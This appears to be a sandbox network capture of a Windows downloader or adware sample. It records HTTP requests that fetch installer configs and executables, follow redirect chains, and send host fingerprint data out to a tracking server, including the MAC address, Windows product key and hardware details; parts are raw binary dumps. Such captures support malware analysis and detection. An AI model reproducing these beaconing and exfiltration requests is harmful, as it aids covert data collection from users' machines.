......x..""33DDUUffww.............x..""33DDUUffww.....................
.....w.fs.............................................................
......................................................................
......................................................................
......................................................................
............................"...2.......)@&.......W.....K....O.....C..
........... 3.!.'3.#"........V".f.....,.........0.:.R.^.wK..PX@J......
..f......^.....\.......^.......^....i........X.........Y.....Q.....B.K
[email protected]......^.....\........f.......^....i........X.........Y.
[email protected]......^.....\........f........f....i......
..X.........Y.....Q.....B.@N........f.......f......d........f........f
....i........X.........Y.....Q.....BYYY@(SS;;21..S^S^[X;R;RKC751:2
<<< skipped >>>


GET /pca3-g5.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "2235a72ff18d351e39c5c63221752775:1442874344"
Last-Modified: Mon, 21 Sep 2015 22:25:43 GMT
Date: Sat, 07 Nov 2015 05:00:11 GMT
Content-Length: 533
Connection: keep-alive
Content-Type: application/pkix-crl
0...0..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U
....VeriSign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For aut
horized use only1E0C..U...<VeriSign Class 3 Public Primary Certific
ation Authority - G5..150917000000Z..151231235959Z0...*.H.............
...v'....{....."W*<../w...Bj.....H......ll..%..Y&.HtQ...}...F.{>
..3.[..z.H...W../.3.Y.C.t....S{^.A.....G...^...YI.[..N.y..........p...
..;....x6z..i7..0...lS$..h.#.9%[.,.1..1....3.....h;<...........W%..
..doi~..e6G........w........{c..............j.Em.....i.HTTP/1.1 200 OK
..Server: Apache..ETag: "2235a72ff18d351e39c5c63221752775:1442874344".
.Last-Modified: Mon, 21 Sep 2015 22:25:43 GMT..Date: Sat, 07 Nov 2015 
05:00:11 GMT..Content-Length: 533..Connection: keep-alive..Content-Typ
e: application/pkix-crl..0...0..0...*.H........0..1.0...U....US1.0...U
....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006
 VeriSign, Inc. - For authorized use only1E0C..U...<VeriSign Class 
3 Public Primary Certification Authority - G5..150917000000Z..15123123
5959Z0...*.H................v'....{....."W*<../w...Bj.....H......ll
..%..Y&.HtQ...}...F.{>..3.[..z.H...W../.3.Y.C.t....S{^.A.....G...^.
..YI.[..N.y..........p.....;....x6z..i7..0...lS$..h.#.9%[.,.1..1....3.
....h;<...........W%....doi~..e6G........w........{c..............j
.Em.....i...
<<< skipped >>>


POST /query?cmd=validurl HTTP/1.1
Content-Length: 96
Connection: Keep-Alive

.#4H.......4.`d.............................8.>?@)674.ih%$d*<=%'8.1<9z;:40;4s..r..\]PTF..lmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00117694860581376522110713
Server: Apache
tracecode: 00117694860581376522110713
Set-Cookie: BAIDUID=2C7B1E2C3C0DA057D1ED518AD3390542:FG=1; expires=Sun, 06-Nov-16 05:00:11 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



GET /dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe?mkey=563da3bbda60d437&f=1224&p=.exe HTTP/1.1
Host: 203.205.148.185
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: CDN_NWS_4.2.1
Connection: keep-alive
Date: Sat, 07 Nov 2015 04:59:59 GMT
Cache-Control: max-age=600
Expires: Sat, 07 Nov 2015 05:09:59 GMT
Last-Modified: Wed, 13 May 2015 09:18:00 GMT
Content-Type: application/octet-stream
Content-Length: 1489144
X-Cache-Lookup: Hit From Disktank
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......0A..t ..t ..
t ......u ..S...m ..S.... ..S...0 .../..u .../..e ..t ... ..S...) ..S.
..u ..S...u ..Richt ..........PE..L....P.......................`......
..............@.......................................................
......................x....@.. O..............`.......................
....................`V..@...............$............................t
ext...1........................... ..`.rdata..N.......................
....@[email protected][email protected]... [email protected]....
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>


GET /u.php?id=89 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.shipinbus.com
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Sat, 07 Nov 2015 12:58:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.28
Location: hXXp://VVV.meiheitou.com/?89-sd--ant-
0..HTTP/1.1 302 Moved Temporarily..Server: nginx..Date: Sat, 07 Nov 20
15 12:58:49 GMT..Content-Type: text/html..Transfer-Encoding: chunked..
Connection: keep-alive..X-Powered-By: PHP/5.3.28..Location: hXXp://www
.meiheitou.com/?89-sd--ant-..0..



GET /cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xui.ptlogin2.qq.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Connection: keep-alive
Keep-Alive: timeout=50, max=1024
Server: QZHTTP-2.38.20
Date: Sat, 07 Nov 2015 05:00:29 GMT
P3P: CP="CAO PSA OUR"
Cache-Control: max-age=604800
Set-Cookie: pt_local_token=-1924241393; PATH=/; DOMAIN=ptlogin2.qq.com;
Last-Modified: Thu, 08 Mar 2012 02:04:00 GMT
Content-type: text/html
Content-Length: 5460
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmln
s="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv="C
ontent-Type" content="text/html; charset=utf-8"><style type="tex
t/css">u{text-decoration:none}body{font-family:Tahoma,Verdana,Arial
,......;font-size:12px;margin:0}.clear{clear:both;font-size:0;line-hei
ght:0;height:0}#login{margin:0 auto;float:none;width:320px;padding:0 0
 10px 50px}.linemid{padding:10px 8px 0 30px;color:gray}.btn_select,.bt
n_gray{border:0;color:#2473a2;width:103px;height:28px;padding-left:2px
;cursor:pointer;font-weight:bold;font-size:14px}.btn_select{background
:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-re
peat -102px -130px}.btn_gray{background:url(hXXp://imgcache.qq.com/ptl
ogin/v4/style/0/images/icons.gif) no-repeat -102px -225px}#login #list
_uin img{padding:7px;background:url(hXXp://imgcache.qq.com/ptlogin/v4/
style/0/images/icons.gif) no-repeat 0 -329px}#list_uin li{list-style:n
one;padding:0 0 0 28px; padding-left:12px;width:270px;word-wrap:break-
word;min-height:20px;clear:both}#list_uin li input{float:left;margin-b
ottom:5px;width:20px}#list_uin label{margin:2px 0 0 4px;float:left;wid
th:220px}#login p{padding:8px 15px 12px 32px;margin:0;font-size:12px;c
olor:#535353}.x_lowLogin{padding:10px 0 0 28px;display:none}</style
><script>var g_begTime=new Date();..(function(){...window.one
rror = function(msg,url,line){....var reportUrl = location.protoco
<<< skipped >>>


GET /Downloaderconfig.aspx?imgtype=9158 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: tj.9158.com
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55


HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 948
X-Via: 1.1 db76:2 (Cdn Cache Server V2.0)
Connection: keep-alive
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "h
ttp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html 
xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>..
...............</title></head>..<body style=" margin:0p
x">..    <form name="form1" method="post" action="Downloaderconf
ig.aspx?imgtype=9158" id="form1">..<div>..<input type="hid
den" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJOTU4MjMyMzI1ZG
TU5ZBXmwe1gDNP/W SPke44 A65Q==" />..</div>..<div>...<
;input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERA
TOR" value="91FFCAD5" />..</div>..    <div>..      ..  
       <object >..        ..              <embed  src="http:/
/tj.9158.com/temp/flash/1.swf"  width="490px" height="180px" quality="
high" pluginspage="hXXp://VVV.macromedia.com/go/getflashplayer" type="
application/x-shockwave-flash" wmode="transparent" ></embed>.
.          </object>.. ..    </div>..    </form>..&l
t;/body>..</html>....



GET /Opendownloadernewxml.aspx?softlist=&lmarkid=88 HTTP/1.1
User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 899
X-Via: 1.1 db76:2 (Cdn Cache Server V2.0)
Connection: keep-alive
<?xml version="1.0" encoding="GB2312"?>..<config>...<Ti
tle>..........9158ktv</Title>...<XieyiUrl>hXXp://tj.915
8.com/temp/provision/9158ktv.htm</XieyiUrl>...<AdvertUrl>h
ttp://tj.9158.com/Downloaderconfig.aspx?imgtype=9158</AdvertUrl>
...<DownloadUrl>hXXp://jh.01lm.com/ktv/</DownloadUrl>...&l
t;ProExe>9158chat2_ktv0{0}_{1}.exe</ProExe>...<Icon>htt
p://tj.9158.com/temp/downloaderico/main.ico</Icon>...<IconTip
s>hXXp://tj.9158.com/temp/files/IconToolTip.exe</IconTips>...
<Setuptime>20</Setuptime>...<ToolIcon>9158........&l
t;/ToolIcon>...<Item>9158ktv</Item>...<Mtype>19&l
t;/Mtype>...<ErrorUrl>hXXp://down.cncpa.net:9000/h003/index.h
tml</ErrorUrl>...<check>....<visible>1</visible&g
t;....<choice>1</choice>....<checkName>........</
checkName>....<downUrl></downUrl>...</check>...&l
t;check>....<visible>1</visible>....<choice>1<
/choice>....<checkName>........</checkName>....<down
Url></downUrl>...</check>..</config>......
<<< skipped >>>

GET /temp/downloaderico/main.ico HTTP/1.1


User-Agent: DownloadInstall
Host: tj.9158.com
Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55


HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:17 GMT
Content-Length: 17542
Content-Type: image/x-icon
Last-Modified: Tue, 03 Sep 2013 15:03:34 GMT
Accept-Ranges: bytes
ETag: "c2a0b8c2b6a8ce1:6d64"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Via: 1.1 fuzhou183:8111 (Cdn Cache Server V2.0), 1.1 db77:10 (Cdn Cache Server V2.0)
Connection: keep-alive
............ .h...F......... .........  .... .....6...00.... ..%......
(....... ..... .........................p^...g...j..vT..vR...`...j...e
..uH..vH...d...c...U..k?..eA..lU.*.g...........}...j...q...........]..
.c...........]..|P..qF..nL...d...............{...t...........m...u....
...e...v...}......tK..z^...z...............}......D....h...p...d..xF..
.............^..x]...q...}..................C...c@....................
.......Q...n.......x...w..........X%...u..D....o...................p..
f=...m...............k...k..W...l(..O...F................n..~]..lH...a
...~...................o...p..g...O....|...............z..uT..vS..._..
.d...c...l..............\...]....................s..nO...^...u........
...............m..X....M...............v..{a..dF...f..................
.]...]..c...R...o8...................{..qR...^...z.......]............
..m1..L....c......................vX..wO...p......................Z...
g/.......................t..rS..sI...........................i........
...................v..hG..tK...f...........~..........................
.............d.._?..o\..pB..~D...C...D...M...N...L...N...R...Q...L...M
..}K..iC..nX.'........................................................
........(.......0..... .............................p].4{c...g..uS..sO
..sN..sM...d...d...c...]..qD..qD..rD..._...^...^...\[email protected]>..gF..m
X.R....o].(.h...w.......z...a..._...]...s...|...z...v...S...R...X...u.
..t...t...c..yJ..qD..f:..d>..oZ.Myb...w...............|...n...l...v
...............a..._...l..............._...W..}Q..uJ..vL..mM..y_..
<<< skipped >>>

GET /DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872431&flag=72ea6a2bb016edd8a444cdd51fccfdc2&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 HTTP/1.1


User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55


HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1134
X-Via: 1.1 db76:2 (Cdn Cache Server V2.0)
Connection: keep-alive
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "h
ttp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html 
xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>..
...............</title></head>..<body>..    <form
 name="form1" method="post" action="DownloadInsertinfo.aspx?Browser=ie
xplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Window
s XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-
CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-
4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&
;Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=144687243
1&flag=72ea6a2bb016edd8a444cdd51fccfdc2&status=1&qqnumber=
&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9" id=
"form1">..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTAT
E" value="/wEPDwUJNzgzNDMwNTMzZGSnkXrJ7Bg7YIIyJXb iSnRqd8R7Q==" />.
.<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGE
NERATOR" value="05019BFC" />..    <div style="text-align:center"
>..    <img  title="webgo"..    </div>..    </form>.
.</body>..</html>......


GET /DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872435&flag=e96394f018d0f2b7394f88916459f7e4&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 HTTP/1.1


User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55


HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1134
X-Via: 1.1 db76:2 (Cdn Cache Server V2.0)
Connection: keep-alive
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "h
ttp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html 
xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>..
...............</title></head>..<body>..    <form
 name="form1" method="post" action="DownloadInsertinfo.aspx?Browser=ie
xplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Window
s XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-
CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-
4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&
;Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=144687243
5&flag=e96394f018d0f2b7394f88916459f7e4&status=2&qqnumber=
&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9" id=
"form1">..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTAT
E" value="/wEPDwUJNzgzNDMwNTMzZGSnkXrJ7Bg7YIIyJXb iSnRqd8R7Q==" />.
.<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGE
NERATOR" value="05019BFC" />..    <div style="text-align:center"
>..    <img  title="webgo"..    </div>..    </form>.
.</body>..</html>......



GET /1/aHR0cDovLzEyMy5zaGlwaW5idXMuY29tL3UucGhwP2lkPTg5 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 17990.vicp.net
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 07 Nov 2015 04:59:45 GMT
Content-Type: text/html
Content-Length: 102
Connection: keep-alive
ETag: "550c2d1a-66"
<script language="javascript" type="text/javascript" src="hXXp://js
.users.51.la/17476535.js"></script>HTTP/1.1 404 Not Found..Se
rver: nginx..Date: Sat, 07 Nov 2015 04:59:45 GMT..Content-Type: text/h
tml..Content-Length: 102..Connection: keep-alive..ETag: "550c2d1a-66".
.<script language="javascript" type="text/javascript" src="hXXp://j
s.users.51.la/17476535.js"></script>..



POST /query?cmd=validurl HTTP/1.1
Content-Length: 125
Connection: Keep-Alive

.#4H.......QC...............................y6...............................................................................
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00089320501911494410110713
Server: Apache
tracecode: 00089320501911494410110713
Set-Cookie: BAIDUID=DA04B4066DA68D7236FB11CB7AC286DA:FG=1; expires=Sun, 06-Nov-16 05:00:08 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 102
Connection: Keep-Alive

.#4H.......:R6.f............................77.9:;TIJOznm.)k'78""#b.!".<??=49x..w75<1gXWQM...ghijklmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35991409270581376522110712
Server: Apache
tracecode: 35991409270581376522110712
Set-Cookie: BAIDUID=005B09C6D83A1A4B8CA6E1AA9F73D13D:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



GET /dc.base/1.0.3/css/base.min.css?1.0.247 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn.daicuo.cc
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:58:41 GMT
Content-Type: text/css
Content-Length: 1691
Last-Modified: Thu, 16 Apr 2015 11:10:24 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "552f98a0-69b"
Expires: Sat, 07 Nov 2015 16:58:41 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
@font-face{font-family:'iconfont';src:url('hXXp://at.alicdn.com/t/font
_1415073294_4967172.eot');src:url('hXXp://at.alicdn.com/t/font_1415073
294_4967172.eot?#iefix') format('embedded-opentype'),url('hXXp://at.al
icdn.com/t/font_1415073294_4967172.woff') format('woff'),url('hXXp://a
t.alicdn.com/t/font_1415073294_4967172.ttf') format('truetype'),url('h
ttp://at.alicdn.com/t/font_1415073294_4967172.svg#iconfont') format('s
vg');}.iconfont{position:relative;top:1px;display:inline-block;font-we
ight:normal;line-height:1;font-family:"iconfont" !important;font-style
:normal;-webkit-font-smoothing:antialiased;-webkit-text-stroke-width:0
.2px;-moz-osx-font-smoothing:grayscale;}.iconfont:empty{width:1em;}.ic
on-tsina:before{content:"\1111";}.icon-tqq:before{content:"\5555";}.ic
on-weixin:before{content:"\e607";}.icon-qq:before{content:"\7777";}.ic
on-qzone:before{content:"\9999";}.icon-top:before{content:"\4444";}.ic
on-dingyue:before{content:"\2222";}.icon-github:before{content:"\3333"
;}.icon-ma:before{content:"\6666";}.icon-yuedu:before{content:"\8888";
}.icon-biaoqing:before{content:"\e600";}.icon-chuangshiren:before{cont
ent:"\e602";}.icon-guanliyuan:before{content:"\e601";}.icon-fenxiang:b
efore{content:"\e603";}.icon-qz:before{content:"\e604";}.icon-addgroup
:before{content:"\e605";}.icon-qunzu:before{content:"\e606";}.icon-tui
jian:before{content:"\e608";}.icon-discover:before{content:"\e60a";}.i
con-website:before{content:"\e60c";}.icon-audit:before{content:"\e612"
;}.icon-music:before{content:"\e60e";}.icon-video:before{content:"
<<< skipped >>>


POST /query?cmd=validurl HTTP/1.1
Content-Length: 117
Connection: Keep-Alive

.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00058821140271667466110713
Server: Apache
tracecode: 00058821140271667466110713
Set-Cookie: BAIDUID=DC3B4452E5376F0DF4258E7C406A2A02:FG=1; expires=Sun, 06-Nov-16 05:00:05 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 123
Connection: Keep-Alive

.#4H.......O.............................................................................to-24564<92$oeQk|Ngax;so}....... !
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35999935041911494410110712
Server: Apache
tracecode: 35999935041911494410110712
Set-Cookie: BAIDUID=005B09C6D83A1A4BFBF5A997083E266E:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



GET /?89-sd--ant- HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:49 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065; expires=Sat, 07-Nov-2015 05:59:49 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
X-Powered-By: ThinkPHP
2218..<!DOCTYPE html>..<html lang="zh-cn">..<head>..
<meta charset="utf-8">..<meta http-equiv="X-UA-Compatible" co
ntent="IE=edge">..<meta name="viewport" content="width=device-wi
dth, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">..<m
eta name="renderer" content="webkit">..<title>...............
..._...1..._.........</title>..<meta name="keywords" content=
"" />..<meta name="description" content="" />..<link rel="
shortcut icon" href="/favicon.ico" type="image/x-icon" />..<link
 rel="stylesheet" type="text/css" href="hXXp://cdn.daicuo.cc/dc.base/1
.0.3/css/base.min.css?1.0.247" />..<link rel="stylesheet" type="
text/css" href="/Public/bootstrap/3.3.5/css/bootstrap.min.css?1.0.247"
 />..<link rel="stylesheet" type="text/css" href="/View/Home/Tas
k/css.base.css?1.0.247" />..<link rel="stylesheet" type="text/cs
s" href="/View/Home/Task/css.task.css?1.0.247" />..<!--[if lt IE
 9]>..<script src="/Public/html5shiv/3.7.2/html5shiv.min.js">
</script>..<script src="/Public/respond/1.4.2/respond.min.js"
></script>..<![endif]-->..<script>var dc={root:"/
",domain:"VVV.xieshouz.com",id:"",page:"1",userid:"",username:"",'lazy
load':""};</script>..</head>..<body>..<nav class=
"navbar navbar-inverse" role="navigation">..  <div class="contai
ner">..  <div class="row"><div class="col-md-12 col-md-off
set-0">..    <div class="navbar-header">..      <butto
<<< skipped >>>

GET /Public/bootstrap/3.3.5/css/bootstrap.min.css?1.0.247 HTTP/1.1


Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:49 GMT
Content-Type: text/css
Content-Length: 122543
Last-Modified: Mon, 12 Oct 2015 17:10:25 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "561be981-1deaf"
Expires: Sat, 07 Nov 2015 16:59:49 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
/*!.. * Bootstrap v3.3.5 (hXXp://getbootstrap.com).. * Copyright 2011-
2015 Twitter, Inc... * Licensed under MIT (hXXps://github.com/twbs/boo
tstrap/blob/master/LICENSE).. *//*! normalize.css v3.0.3 | MIT License
 | github.com/necolas/normalize.css */html{font-family:sans-serif;-web
kit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}arti
cle,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav
,section,summary{display:block}audio,canvas,progress,video{display:inl
ine-block;vertical-align:baseline}audio:not([controls]){display:none;h
eight:0}[hidden],template{display:none}a{background-color:transparent}
a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,stro
ng{font-weight:700}dfn{font-style:italic}h1{margin:.67em 0;font-size:2
em}mark{color:#000;background:#ff0}small{font-size:80%}sub,sup{positio
n:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top
